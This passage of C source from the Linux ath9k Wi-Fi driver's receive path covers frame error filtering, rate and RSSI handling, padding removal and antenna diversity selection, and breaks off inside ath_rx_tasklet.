&& !(rx_stats->rs_status & (ATH9K_RXERR_DECRYPT | ATH9K_RXERR_CRC | ATH9K_RXERR_MIC | ATH9K_RXERR_KEYMISS)); /* * Key miss events are only relevant for pairwise keys where the * descriptor does contain a valid key index. This has been observed * mostly with CCMP encryption. */ if (rx_stats->rs_keyix == ATH9K_RXKEYIX_INVALID) rx_stats->rs_status &= ~ATH9K_RXERR_KEYMISS; if (!rx_stats->rs_datalen) return false; /* * rs_status follows rs_datalen so if rs_datalen is too large * we can take a hint that hardware corrupted it, so ignore * those frames. */ if (rx_stats->rs_datalen > (common->rx_bufsize - rx_status_len)) return false; /* Only use error bits from the last fragment */ if (rx_stats->rs_more) return true; mic_error = is_valid_tkip && !ieee80211_is_ctl(fc) && !ieee80211_has_morefrags(fc) && !(le16_to_cpu(hdr->seq_ctrl) & IEEE80211_SCTL_FRAG) && (rx_stats->rs_status & ATH9K_RXERR_MIC); /* * The rx_stats->rs_status will not be set until the end of the * chained descriptors so it can be ignored if rs_more is set. The * rs_more will be false at the last element of the chained * descriptors. */ if (rx_stats->rs_status != 0) { u8 status_mask; if (rx_stats->rs_status & ATH9K_RXERR_CRC) { rxs->flag |= RX_FLAG_FAILED_FCS_CRC; mic_error = false; } if (rx_stats->rs_status & ATH9K_RXERR_PHY) return false; if ((rx_stats->rs_status & ATH9K_RXERR_DECRYPT) || (!is_mc && (rx_stats->rs_status & ATH9K_RXERR_KEYMISS))) { *decrypt_error = true; mic_error = false; } /* * Reject error frames with the exception of * decryption and MIC failures. For monitor mode, * we also ignore the CRC error. */ status_mask = ATH9K_RXERR_DECRYPT | ATH9K_RXERR_MIC | ATH9K_RXERR_KEYMISS; if (ah->is_monitoring && (sc->rx.rxfilter & FIF_FCSFAIL)) status_mask |= ATH9K_RXERR_CRC; if (rx_stats->rs_status & ~status_mask) return false; } /* * For unicast frames the MIC error bit can have false positives, * so all MIC error reports need to be validated in software. * False negatives are not common, so skip software verification * if the hardware considers the MIC valid. */ if (strip_mic) rxs->flag |= RX_FLAG_MMIC_STRIPPED; else if (is_mc && mic_error) rxs->flag |= RX_FLAG_MMIC_ERROR; return true; } static int ath9k_process_rate(struct ath_common *common, struct ieee80211_hw *hw, struct ath_rx_status *rx_stats, struct ieee80211_rx_status *rxs) { struct ieee80211_supported_band *sband; enum ieee80211_band band; unsigned int i = 0; band = hw->conf.channel->band; sband = hw->wiphy->bands[band]; if (rx_stats->rs_rate & 0x80) { /* HT rate */ rxs->flag |= RX_FLAG_HT; if (rx_stats->rs_flags & ATH9K_RX_2040) rxs->flag |= RX_FLAG_40MHZ; if (rx_stats->rs_flags & ATH9K_RX_GI) rxs->flag |= RX_FLAG_SHORT_GI; rxs->rate_idx = rx_stats->rs_rate & 0x7f; return 0; } for (i = 0; i < sband->n_bitrates; i++) { if (sband->bitrates[i].hw_value == rx_stats->rs_rate) { rxs->rate_idx = i; return 0; } if (sband->bitrates[i].hw_value_short == rx_stats->rs_rate) { rxs->flag |= RX_FLAG_SHORTPRE; rxs->rate_idx = i; return 0; } } /* * No valid hardware bitrate found -- we should not get here * because hardware has already validated this frame as OK. */ ath_dbg(common, ANY, "unsupported hw bitrate detected 0x%02x using 1 Mbit\n", rx_stats->rs_rate); return -EINVAL; } static void ath9k_process_rssi(struct ath_common *common, struct ieee80211_hw *hw, struct ieee80211_hdr *hdr, struct ath_rx_status *rx_stats) { struct ath_softc *sc = hw->priv; struct ath_hw *ah = common->ah; int last_rssi; int rssi = rx_stats->rs_rssi; if (!rx_stats->is_mybeacon || ((ah->opmode != NL80211_IFTYPE_STATION) && (ah->opmode != NL80211_IFTYPE_ADHOC))) return; if (rx_stats->rs_rssi != ATH9K_RSSI_BAD && !rx_stats->rs_moreaggr) ATH_RSSI_LPF(sc->last_rssi, rx_stats->rs_rssi); last_rssi = sc->last_rssi; if (likely(last_rssi != ATH_RSSI_DUMMY_MARKER)) rssi = ATH_EP_RND(last_rssi, ATH_RSSI_EP_MULTIPLIER); if (rssi < 0) rssi = 0; /* Update Beacon RSSI, this is used by ANI. */ ah->stats.avgbrssi = rssi; } /* * For Decrypt or Demic errors, we only mark packet status here and always push * up the frame up to let mac80211 handle the actual error case, be it no * decryption key or real decryption error. This let us keep statistics there. */ static int ath9k_rx_skb_preprocess(struct ath_common *common, struct ieee80211_hw *hw, struct ieee80211_hdr *hdr, struct ath_rx_status *rx_stats, struct ieee80211_rx_status *rx_status, bool *decrypt_error) { struct ath_hw *ah = common->ah; /* * everything but the rate is checked here, the rate check is done * separately to avoid doing two lookups for a rate for each frame. */ if (!ath9k_rx_accept(common, hdr, rx_status, rx_stats, decrypt_error)) return -EINVAL; /* Only use status info from the last fragment */ if (rx_stats->rs_more) return 0; ath9k_process_rssi(common, hw, hdr, rx_stats); if (ath9k_process_rate(common, hw, rx_stats, rx_status)) return -EINVAL; rx_status->band = hw->conf.channel->band; rx_status->freq = hw->conf.channel->center_freq; rx_status->signal = ah->noise + rx_stats->rs_rssi; rx_status->antenna = rx_stats->rs_antenna; rx_status->flag |= RX_FLAG_MACTIME_MPDU; if (rx_stats->rs_moreaggr) rx_status->flag |= RX_FLAG_NO_SIGNAL_VAL; return 0; } static void ath9k_rx_skb_postprocess(struct ath_common *common, struct sk_buff *skb, struct ath_rx_status *rx_stats, struct ieee80211_rx_status *rxs, bool decrypt_error) { struct ath_hw *ah = common->ah; struct ieee80211_hdr *hdr; int hdrlen, padpos, padsize; u8 keyix; __le16 fc; /* see if any padding is done by the hw and remove it */ hdr = (struct ieee80211_hdr *) skb->data; hdrlen = ieee80211_get_hdrlen_from_skb(skb); fc = hdr->frame_control; padpos = ath9k_cmn_padpos(hdr->frame_control); /* The MAC header is padded to have 32-bit boundary if the * packet payload is non-zero. The general calculation for * padsize would take into account odd header lengths: * padsize = (4 - padpos % 4) % 4; However, since only * even-length headers are used, padding can only be 0 or 2 * bytes and we can optimize this a bit. In addition, we must * not try to remove padding from short control frames that do * not have payload. */ padsize = padpos & 3; if (padsize && skb->len>=padpos+padsize+FCS_LEN) { memmove(skb->data + padsize, skb->data, padpos); skb_pull(skb, padsize); } keyix = rx_stats->rs_keyix; if (!(keyix == ATH9K_RXKEYIX_INVALID) && !decrypt_error && ieee80211_has_protected(fc)) { rxs->flag |= RX_FLAG_DECRYPTED; } else if (ieee80211_has_protected(fc) && !decrypt_error && skb->len >= hdrlen + 4) { keyix = skb->data[hdrlen + 3] >> 6; if (test_bit(keyix, common->keymap)) rxs->flag |= RX_FLAG_DECRYPTED; } if (ah->sw_mgmt_crypto && (rxs->flag & RX_FLAG_DECRYPTED) && ieee80211_is_mgmt(fc)) /* Use software decrypt for management frames. */ rxs->flag &= ~RX_FLAG_DECRYPTED; } static void ath_lnaconf_alt_good_scan(struct ath_ant_comb *antcomb, struct ath_hw_antcomb_conf ant_conf, int main_rssi_avg) { antcomb->quick_scan_cnt = 0; if (ant_conf.main_lna_conf == ATH_ANT_DIV_COMB_LNA2) antcomb->rssi_lna2 = main_rssi_avg; else if (ant_conf.main_lna_conf == ATH_ANT_DIV_COMB_LNA1) antcomb->rssi_lna1 = main_rssi_avg; switch ((ant_conf.main_lna_conf << 4) | ant_conf.alt_lna_conf) { case 0x10: /* LNA2 A-B */ antcomb->main_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2; antcomb->first_quick_scan_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2; antcomb->second_quick_scan_conf = ATH_ANT_DIV_COMB_LNA1; break; case 0x20: /* LNA1 A-B */ antcomb->main_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2; antcomb->first_quick_scan_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2; antcomb->second_quick_scan_conf = ATH_ANT_DIV_COMB_LNA2; break; case 0x21: /* LNA1 LNA2 */ antcomb->main_conf = ATH_ANT_DIV_COMB_LNA2; antcomb->first_quick_scan_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2; antcomb->second_quick_scan_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2; break; case 0x12: /* LNA2 LNA1 */ antcomb->main_conf = ATH_ANT_DIV_COMB_LNA1; antcomb->first_quick_scan_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2; antcomb->second_quick_scan_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2; break; case 0x13: /* LNA2 A+B */ antcomb->main_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2; antcomb->first_quick_scan_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2; antcomb->second_quick_scan_conf = ATH_ANT_DIV_COMB_LNA1; break; case 0x23: /* LNA1 A+B */ antcomb->main_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2; antcomb->first_quick_scan_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2; antcomb->second_quick_scan_conf = ATH_ANT_DIV_COMB_LNA2; break; default: break; } } static void ath_select_ant_div_from_quick_scan(struct ath_ant_comb *antcomb, struct ath_hw_antcomb_conf *div_ant_conf, int main_rssi_avg, int alt_rssi_avg, int alt_ratio) { /* alt_good */ switch (antcomb->quick_scan_cnt) { case 0: /* set alt to main, and alt to first conf */ div_ant_conf->main_lna_conf = antcomb->main_conf; div_ant_conf->alt_lna_conf = antcomb->first_quick_scan_conf; break; case 1: /* set alt to main, and alt to first conf */ div_ant_conf->main_lna_conf = antcomb->main_conf; div_ant_conf->alt_lna_conf = antcomb->second_quick_scan_conf; antcomb->rssi_first = main_rssi_avg; antcomb->rssi_second = alt_rssi_avg; if (antcomb->main_conf == ATH_ANT_DIV_COMB_LNA1) { /* main is LNA1 */ if (ath_is_alt_ant_ratio_better(alt_ratio, ATH_ANT_DIV_COMB_LNA1_DELTA_HI, ATH_ANT_DIV_COMB_LNA1_DELTA_LOW, main_rssi_avg, alt_rssi_avg, antcomb->total_pkt_count)) antcomb->first_ratio = true; else antcomb->first_ratio = false; } else if (antcomb->main_conf == ATH_ANT_DIV_COMB_LNA2) { if (ath_is_alt_ant_ratio_better(alt_ratio, ATH_ANT_DIV_COMB_LNA1_DELTA_MID, ATH_ANT_DIV_COMB_LNA1_DELTA_LOW, main_rssi_avg, alt_rssi_avg, antcomb->total_pkt_count)) antcomb->first_ratio = true; else antcomb->first_ratio = false; } else { if ((((alt_ratio >= ATH_ANT_DIV_COMB_ALT_ANT_RATIO2) && (alt_rssi_avg > main_rssi_avg + ATH_ANT_DIV_COMB_LNA1_DELTA_HI)) || (alt_rssi_avg > main_rssi_avg)) && (antcomb->total_pkt_count > 50)) antcomb->first_ratio = true; else antcomb->first_ratio = false; } break; case 2: antcomb->alt_good = false; antcomb->scan_not_start = false; antcomb->scan = false; antcomb->rssi_first = main_rssi_avg; antcomb->rssi_third = alt_rssi_avg; if (antcomb->second_quick_scan_conf == ATH_ANT_DIV_COMB_LNA1) antcomb->rssi_lna1 = alt_rssi_avg; else if (antcomb->second_quick_scan_conf == ATH_ANT_DIV_COMB_LNA2) antcomb->rssi_lna2 = alt_rssi_avg; else if (antcomb->second_quick_scan_conf == ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2) { if (antcomb->main_conf == ATH_ANT_DIV_COMB_LNA2) antcomb->rssi_lna2 = main_rssi_avg; else if (antcomb->main_conf == ATH_ANT_DIV_COMB_LNA1) antcomb->rssi_lna1 = main_rssi_avg; } if (antcomb->rssi_lna2 > antcomb->rssi_lna1 + ATH_ANT_DIV_COMB_LNA1_LNA2_SWITCH_DELTA) div_ant_conf->main_lna_conf = ATH_ANT_DIV_COMB_LNA2; else div_ant_conf->main_lna_conf = ATH_ANT_DIV_COMB_LNA1; if (antcomb->main_conf == ATH_ANT_DIV_COMB_LNA1) { if (ath_is_alt_ant_ratio_better(alt_ratio, ATH_ANT_DIV_COMB_LNA1_DELTA_HI, ATH_ANT_DIV_COMB_LNA1_DELTA_LOW, main_rssi_avg, alt_rssi_avg, antcomb->total_pkt_count)) antcomb->second_ratio = true; else antcomb->second_ratio = false; } else if (antcomb->main_conf == ATH_ANT_DIV_COMB_LNA2) { if (ath_is_alt_ant_ratio_better(alt_ratio, ATH_ANT_DIV_COMB_LNA1_DELTA_MID, ATH_ANT_DIV_COMB_LNA1_DELTA_LOW, main_rssi_avg, alt_rssi_avg, antcomb->total_pkt_count)) antcomb->second_ratio = true; else antcomb->second_ratio = false; } else { if ((((alt_ratio >= ATH_ANT_DIV_COMB_ALT_ANT_RATIO2) && (alt_rssi_avg > main_rssi_avg + ATH_ANT_DIV_COMB_LNA1_DELTA_HI)) || (alt_rssi_avg > main_rssi_avg)) && (antcomb->total_pkt_count > 50)) antcomb->second_ratio = true; else antcomb->second_ratio = false; } /* set alt to the conf with maximun ratio */ if (antcomb->first_ratio && antcomb->second_ratio) { if (antcomb->rssi_second > antcomb->rssi_third) { /* first alt*/ if ((antcomb->first_quick_scan_conf == ATH_ANT_DIV_COMB_LNA1) || (antcomb->first_quick_scan_conf == ATH_ANT_DIV_COMB_LNA2)) /* Set alt LNA1 or LNA2*/ if (div_ant_conf->main_lna_conf == ATH_ANT_DIV_COMB_LNA2) div_ant_conf->alt_lna_conf = ATH_ANT_DIV_COMB_LNA1; else div_ant_conf->alt_lna_conf = ATH_ANT_DIV_COMB_LNA2; else /* Set alt to A+B or A-B */ div_ant_conf->alt_lna_conf = antcomb->first_quick_scan_conf; } else if ((antcomb->second_quick_scan_conf == ATH_ANT_DIV_COMB_LNA1) || (antcomb->second_quick_scan_conf == ATH_ANT_DIV_COMB_LNA2)) { /* Set alt LNA1 or LNA2 */ if (div_ant_conf->main_lna_conf == ATH_ANT_DIV_COMB_LNA2) div_ant_conf->alt_lna_conf = ATH_ANT_DIV_COMB_LNA1; else div_ant_conf->alt_lna_conf = ATH_ANT_DIV_COMB_LNA2; } else { /* Set alt to A+B or A-B */ div_ant_conf->alt_lna_conf = antcomb->second_quick_scan_conf; } } else if (antcomb->first_ratio) { /* first alt */ if ((antcomb->first_quick_scan_conf == ATH_ANT_DIV_COMB_LNA1) || (antcomb->first_quick_scan_conf == ATH_ANT_DIV_COMB_LNA2)) /* Set alt LNA1 or LNA2 */ if (div_ant_conf->main_lna_conf == ATH_ANT_DIV_COMB_LNA2) div_ant_conf->alt_lna_conf = ATH_ANT_DIV_COMB_LNA1; else div_ant_conf->alt_lna_conf = ATH_ANT_DIV_COMB_LNA2; else /* Set alt to A+B or A-B */ div_ant_conf->alt_lna_conf = antcomb->first_quick_scan_conf; } else if (antcomb->second_ratio) { /* second alt */ if ((antcomb->second_quick_scan_conf == ATH_ANT_DIV_COMB_LNA1) || (antcomb->second_quick_scan_conf == ATH_ANT_DIV_COMB_LNA2)) /* Set alt LNA1 or LNA2 */ if (div_ant_conf->main_lna_conf == ATH_ANT_DIV_COMB_LNA2) div_ant_conf->alt_lna_conf = ATH_ANT_DIV_COMB_LNA1; else div_ant_conf->alt_lna_conf = ATH_ANT_DIV_COMB_LNA2; else /* Set alt to A+B or A-B */ div_ant_conf->alt_lna_conf = antcomb->second_quick_scan_conf; } else { /* main is largest */ if ((antcomb->main_conf == ATH_ANT_DIV_COMB_LNA1) || (antcomb->main_conf == ATH_ANT_DIV_COMB_LNA2)) /* Set alt LNA1 or LNA2 */ if (div_ant_conf->main_lna_conf == ATH_ANT_DIV_COMB_LNA2) div_ant_conf->alt_lna_conf = ATH_ANT_DIV_COMB_LNA1; else div_ant_conf->alt_lna_conf = ATH_ANT_DIV_COMB_LNA2; else /* Set alt to A+B or A-B */ div_ant_conf->alt_lna_conf = antcomb->main_conf; } break; default: break; } } static void ath_ant_div_conf_fast_divbias(struct ath_hw_antcomb_conf *ant_conf, struct ath_ant_comb *antcomb, int alt_ratio) { if (ant_conf->div_group == 0) { /* Adjust the fast_div_bias based on main and alt lna conf */ switch ((ant_conf->main_lna_conf << 4) | ant_conf->alt_lna_conf) { case 0x01: /* A-B LNA2 */ ant_conf->fast_div_bias = 0x3b; break; case 0x02: /* A-B LNA1 */ ant_conf->fast_div_bias = 0x3d; break; case 0x03: /* A-B A+B */ ant_conf->fast_div_bias = 0x1; break; case 0x10: /* LNA2 A-B */ ant_conf->fast_div_bias = 0x7; break; case 0x12: /* LNA2 LNA1 */ ant_conf->fast_div_bias = 0x2; break; case 0x13: /* LNA2 A+B */ ant_conf->fast_div_bias = 0x7; break; case 0x20: /* LNA1 A-B */ ant_conf->fast_div_bias = 0x6; break; case 0x21: /* LNA1 LNA2 */ ant_conf->fast_div_bias = 0x0; break; case 0x23: /* LNA1 A+B */ ant_conf->fast_div_bias = 0x6; break; case 0x30: /* A+B A-B */ ant_conf->fast_div_bias = 0x1; break; case 0x31: /* A+B LNA2 */ ant_conf->fast_div_bias = 0x3b; break; case 0x32: /* A+B LNA1 */ ant_conf->fast_div_bias = 0x3d; break; default: break; } } else if (ant_conf->div_group == 1) { /* Adjust the fast_div_bias based on main and alt_lna_conf */ switch ((ant_conf->main_lna_conf << 4) | ant_conf->alt_lna_conf) { case 0x01: /* A-B LNA2 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x02: /* A-B LNA1 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x03: /* A-B A+B */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x10: /* LNA2 A-B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) ant_conf->fast_div_bias = 0x3f; else ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x12: /* LNA2 LNA1 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x13: /* LNA2 A+B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) ant_conf->fast_div_bias = 0x3f; else ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x20: /* LNA1 A-B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) ant_conf->fast_div_bias = 0x3f; else ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x21: /* LNA1 LNA2 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x23: /* LNA1 A+B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) ant_conf->fast_div_bias = 0x3f; else ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x30: /* A+B A-B */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x31: /* A+B LNA2 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x32: /* A+B LNA1 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; default: break; } } else if (ant_conf->div_group == 2) { /* Adjust the fast_div_bias based on main and alt_lna_conf */ switch ((ant_conf->main_lna_conf << 4) | ant_conf->alt_lna_conf) { case 0x01: /* A-B LNA2 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x02: /* A-B LNA1 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x03: /* A-B A+B */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x10: /* LNA2 A-B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) ant_conf->fast_div_bias = 0x1; else ant_conf->fast_div_bias = 0x2; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x12: /* LNA2 LNA1 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x13: /* LNA2 A+B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) ant_conf->fast_div_bias = 0x1; else ant_conf->fast_div_bias = 0x2; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x20: /* LNA1 A-B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) ant_conf->fast_div_bias = 0x1; else ant_conf->fast_div_bias = 0x2; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x21: /* LNA1 LNA2 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x23: /* LNA1 A+B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) ant_conf->fast_div_bias = 0x1; else ant_conf->fast_div_bias = 0x2; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x30: /* A+B A-B */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x31: /* A+B LNA2 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x32: /* A+B LNA1 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; default: break; } } } /* Antenna diversity and combining */ static void ath_ant_comb_scan(struct ath_softc *sc, struct ath_rx_status *rs) { struct ath_hw_antcomb_conf div_ant_conf; struct ath_ant_comb *antcomb = &sc->ant_comb; int alt_ratio = 0, alt_rssi_avg = 0, main_rssi_avg = 0, curr_alt_set; int curr_main_set; int main_rssi = rs->rs_rssi_ctl0; int alt_rssi = rs->rs_rssi_ctl1; int rx_ant_conf, main_ant_conf; bool short_scan = false; rx_ant_conf = (rs->rs_rssi_ctl2 >> ATH_ANT_RX_CURRENT_SHIFT) & ATH_ANT_RX_MASK; main_ant_conf = (rs->rs_rssi_ctl2 >> ATH_ANT_RX_MAIN_SHIFT) & ATH_ANT_RX_MASK; /* Record packet only when both main_rssi and alt_rssi is positive */ if (main_rssi > 0 && alt_rssi > 0) { antcomb->total_pkt_count++; antcomb->main_total_rssi += main_rssi; antcomb->alt_total_rssi += alt_rssi; if (main_ant_conf == rx_ant_conf) antcomb->main_recv_cnt++; else antcomb->alt_recv_cnt++; } /* Short scan check */ if (antcomb->scan && antcomb->alt_good) { if (time_after(jiffies, antcomb->scan_start_time + msecs_to_jiffies(ATH_ANT_DIV_COMB_SHORT_SCAN_INTR))) short_scan = true; else if (antcomb->total_pkt_count == ATH_ANT_DIV_COMB_SHORT_SCAN_PKTCOUNT) { alt_ratio = ((antcomb->alt_recv_cnt * 100) / antcomb->total_pkt_count); if (alt_ratio < ATH_ANT_DIV_COMB_ALT_ANT_RATIO) short_scan = true; } } if (((antcomb->total_pkt_count < ATH_ANT_DIV_COMB_MAX_PKTCOUNT) || rs->rs_moreaggr) && !short_scan) return; if (antcomb->total_pkt_count) { alt_ratio = ((antcomb->alt_recv_cnt * 100) / antcomb->total_pkt_count); main_rssi_avg = (antcomb->main_total_rssi / antcomb->total_pkt_count); alt_rssi_avg = (antcomb->alt_total_rssi / antcomb->total_pkt_count); } ath9k_hw_antdiv_comb_conf_get(sc->sc_ah, &div_ant_conf); curr_alt_set = div_ant_conf.alt_lna_conf; curr_main_set = div_ant_conf.main_lna_conf; antcomb->count++; if (antcomb->count == ATH_ANT_DIV_COMB_MAX_COUNT) { if (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO) { ath_lnaconf_alt_good_scan(antcomb, div_ant_conf, main_rssi_avg); antcomb->alt_good = true; } else { antcomb->alt_good = false; } antcomb->count = 0; antcomb->scan = true; antcomb->scan_not_start = true; } if (!antcomb->scan) { if (ath_ant_div_comb_alt_check(div_ant_conf.div_group, alt_ratio, curr_main_set, curr_alt_set, alt_rssi_avg, main_rssi_avg)) { if (curr_alt_set == ATH_ANT_DIV_COMB_LNA2) { /* Switch main and alt LNA */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA2; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1; } else if (curr_alt_set == ATH_ANT_DIV_COMB_LNA1) { div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA1; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA2; } goto div_comb_done; } else if ((curr_alt_set != ATH_ANT_DIV_COMB_LNA1) && (curr_alt_set != ATH_ANT_DIV_COMB_LNA2)) { /* Set alt to another LNA */ if (curr_main_set == ATH_ANT_DIV_COMB_LNA2) div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1; else if (curr_main_set == ATH_ANT_DIV_COMB_LNA1) div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA2; goto div_comb_done; } if ((alt_rssi_avg < (main_rssi_avg + div_ant_conf.lna1_lna2_delta))) goto div_comb_done; } if (!antcomb->scan_not_start) { switch (curr_alt_set) { case ATH_ANT_DIV_COMB_LNA2: antcomb->rssi_lna2 = alt_rssi_avg; antcomb->rssi_lna1 = main_rssi_avg; antcomb->scan = true; /* set to A+B */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA1; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2; break; case ATH_ANT_DIV_COMB_LNA1: antcomb->rssi_lna1 = alt_rssi_avg; antcomb->rssi_lna2 = main_rssi_avg; antcomb->scan = true; /* set to A+B */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA2; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2; break; case ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2: antcomb->rssi_add = alt_rssi_avg; antcomb->scan = true; /* set to A-B */ div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2; break; case ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2: antcomb->rssi_sub = alt_rssi_avg; antcomb->scan = false; if (antcomb->rssi_lna2 > (antcomb->rssi_lna1 + ATH_ANT_DIV_COMB_LNA1_LNA2_SWITCH_DELTA)) { /* use LNA2 as main LNA */ if ((antcomb->rssi_add > antcomb->rssi_lna1) && (antcomb->rssi_add > antcomb->rssi_sub)) { /* set to A+B */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA2; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2; } else if (antcomb->rssi_sub > antcomb->rssi_lna1) { /* set to A-B */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA2; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2; } else { /* set to LNA1 */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA2; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1; } } else { /* use LNA1 as main LNA */ if ((antcomb->rssi_add > antcomb->rssi_lna2) && (antcomb->rssi_add > antcomb->rssi_sub)) { /* set to A+B */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA1; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2; } else if (antcomb->rssi_sub > antcomb->rssi_lna1) { /* set to A-B */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA1; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2; } else { /* set to LNA2 */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA1; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA2; } } break; default: break; } } else { if (!antcomb->alt_good) { antcomb->scan_not_start = false; /* Set alt to another LNA */ if (curr_main_set == ATH_ANT_DIV_COMB_LNA2) { div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA2; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1; } else if (curr_main_set == ATH_ANT_DIV_COMB_LNA1) { div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA1; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA2; } goto div_comb_done; } } ath_select_ant_div_from_quick_scan(antcomb, &div_ant_conf, main_rssi_avg, alt_rssi_avg, alt_ratio); antcomb->quick_scan_cnt++; div_comb_done: ath_ant_div_conf_fast_divbias(&div_ant_conf, antcomb, alt_ratio); ath9k_hw_antdiv_comb_conf_set(sc->sc_ah, &div_ant_conf); antcomb->scan_start_time = jiffies; antcomb->total_pkt_count = 0; antcomb->main_total_rssi = 0; antcomb->alt_total_rssi = 0; antcomb->main_recv_cnt = 0; antcomb->alt_recv_cnt = 0; } int ath_rx_tasklet(struct ath_softc *sc, int flush, bool hp) { struct ath_buf *bf; struct sk_buff *skb = NULL, *requeue_skb, *hdr_skb; struct ieee80211_rx_status *rxs; struct ath_hw *ah = sc->sc_ah; struct ath_common *common = ath9k_hw_common(ah); struct ieee80211_hw *hw = sc->hw; struct ieee80211_hdr *hdr; int retval; bool decrypt_error = false; struct ath_rx_status rs; enum ath9k_rx_qtype qtype; bool edma = !!(ah->caps.hw_caps & ATH9K_HW_CAP_EDMA); int dma_type; u8 rx_status_len = 